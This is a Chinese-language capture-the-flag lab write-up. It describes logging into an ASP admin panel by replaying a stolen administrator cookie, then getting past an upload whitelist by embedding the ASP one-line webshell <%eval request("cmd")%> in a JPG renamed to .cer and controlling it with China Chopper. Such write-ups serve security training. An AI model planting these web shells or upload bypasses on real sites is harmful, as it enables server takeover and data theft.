提示:
1,通過修改Cookie登錄后台(沒用重打)2,上傳SHELL!3,Flag在Web根目錄(flag.php)3.上傳圖片時建議上傳小文件,我建議用QQ表情
尤里通過XSS終於得到了管理員Cookie,在修改了cookie后尤里直接繞過了登錄密碼,
看到了后台功能!然后要做的,就是找一個上傳點,上傳自己的外殼了!
靶場地址
http://59.63.200.79:8005/admin/Login.asp
1、登錄后台
根據提示--------------直接抓包
上一關獲取了管理員Cookie
ASPSESSIONIDSQATTCBS=JJLAMLACCEODAHFIAOCGBPLA; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
去除flag部分,如下
ASPSESSIONIDSQATTCBS=JJLAMLACCEODAHFIAOCGBPLA;ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
將原有的Cookie進行替換
登錄成功
2、上傳Shell
通過對后台頁面研究發現,此處可能有機會上傳一句話木馬,且上傳類型限制為白名單
看見cer。我直接就想到了上傳cer文件木馬,說干就干
直接上傳一句話木馬重命名的cer文件出現這個情況,我猜后台應該對文件內容有所過濾。
隨便找一張jpg圖片(正常的),選擇屬性--->雙擊--->寫入一句話木馬
在將這張jpg圖片進行重命名為cer文件
將cer文件上傳,上傳成功
3、菜刀連接
連接成功后,在C盤下有flag,由於一句話木馬權限不夠,將flag下載到桌面
本以為到這里就結束了,后來發現對這個falg.txt文件沒有操作權限。
嘗試上傳大馬,但上傳不了。D盤、E盤也點不開。
百思不得其解時,我看得見網頁后綴為asp。
一下反應過來,上傳包含了asp一句話木馬的cer文件
<%eval request("cmd")%>
但還是沒有辦法下載,訪問在C盤的那個flag.txt文件。
但是D盤可以打開了
4、成功拿到flag